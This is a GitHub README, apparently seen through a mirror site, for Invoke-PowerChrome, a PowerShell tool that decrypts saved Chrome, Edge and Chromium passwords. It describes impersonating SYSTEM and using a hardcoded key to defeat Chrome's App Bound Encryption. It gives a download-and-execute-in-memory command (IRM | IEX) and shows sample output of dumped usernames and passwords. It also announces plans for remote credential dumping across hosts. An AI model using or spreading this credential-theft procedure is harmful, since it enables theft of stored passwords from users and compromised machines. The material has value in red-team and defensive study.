这是indexloc提供的服务,不要输入任何密码
Skip to content

0xsudomode/invoke-powerchrome

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
Invoke-PowerChrome.ps1
Invoke-PowerChrome.ps1
 
 
README.md
README.md
 
 

Repository files navigation

Invoke-PowerChrome

A PowerShell script for decrypting Chromium-based browser passwords, supporting both v10 (DPAPI user) and Google Chrome v20 (App Bound Encryption) encrypted blobs.

The script dynamically interacts with Windows cryptographic APIs to decrypt passwords without external dependencies and can be executed in memory.

This code is based on the following PoC: https://github.com/runassu/chrome_v20_decryption

Microsoft Edge / Chromium v10 Blobs

Requirements

  • No special privileges required
  • Runs in current user context

Process Overview

  • Read Local State file → get os_crypt.encrypted_key.
  • Strip DPAPI prefix → DPAPI Unprotect (CurrentUser) → derive master key.
  • AES-GCM decrypt password blobs in Login Data with the master key.

Google Chrome v20 blobs (App Bound Encryption)

Requirements

  • Administrative rights (to impersonate SYSTEM)

Process Overview

  • Read Local State file → get os_crypt.app_bound_encrypted_key
  • Impersonate SYSTEM → DPAPI Unprotect (SYSTEM) → Rev2self → DPAPI Unprotect (CurrentUser).
  • Parse flag-3 blob → extract encrypted_aes_key, iv, ciphertext, tag.
  • Open NCrypt key "Google Chromekey1" → Decrypt → XOR with fixed 32-byte hardcoded key from elevation_service.exe → derive aes_key.
  • AES-GCM decrypt (iv, ciphertext, tag) with aes_key → get app_bound_key.
  • AES-GCM decrypt password blobs in Login Data with the app_bound_key.

Usage

Load into memory

IRM 'https://raw.githubusercontent.com/The-Viper-One/Invoke-PowerChrome/refs/heads/main/Invoke-PowerChrome.ps1' | IEX

Example Commands

Invoke-PowerChrome -Browser Chrome
Invoke-PowerChrome -Browser Chromium
Invoke-PowerChrome -Browser Edge

# Hide Banner
Invoke-PowerChrome -Browser Chrome -HideBanner

# Verbose
Invoke-PowerChrome -Browser Chrome -Verbose

Example Output

    ____                          ________
   / __ \______      _____  _____/ ____/ /_  _________  ____ ___  ___
  / /_/ / __ \ | /| / / _ \/ ___/ /   / __ \/ ___/ __ \/ __ `__ \/ _ \
 / ____/ /_/ / |/ |/ /  __/ /  / /___/ / / / /  / /_/ / / / / / /  __/
/_/    \____/|__/|__/\___/_/   \____/_/ /_/_/   \____/_/ /_/ /_/\___/

Github: https://github.com/The-Viper-One/


[*] Microsoft Edge
[+] Decrypted Credentials

Target                 Username         Password
------                 --------         --------
https://tryhackme.com/ test@email.com   Password123-1!
https://tryhackme.com/ test_2@email.com L0ngAsFKP@ssW0rd

[*] Google Chrome
[+] Decrypted Credentials

Target                 Username                  Password
------                 --------                  --------
https://tryhackme.com/ test@Chrome_Browser.com   G0oGl3Chr0m3
https://tryhackme.com/ test_2@Chrome_Browser.com letmein

Future Work

Future updates will bring the following updates:

  • Cookie decryption
  • Decryption of profiles other than "default"
  • Additional Chromium-based browser support

Integration with PsMapExec

This codebase will be merged into PsMapExec to support remote dumping of Chromium-based passwords. It will also integrate with SessionExec to leverage active user sessions and decrypt each user’s Chromium credentials.

References

About

Decrypt Chromium based browser passwords with PowerShell.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 100.0%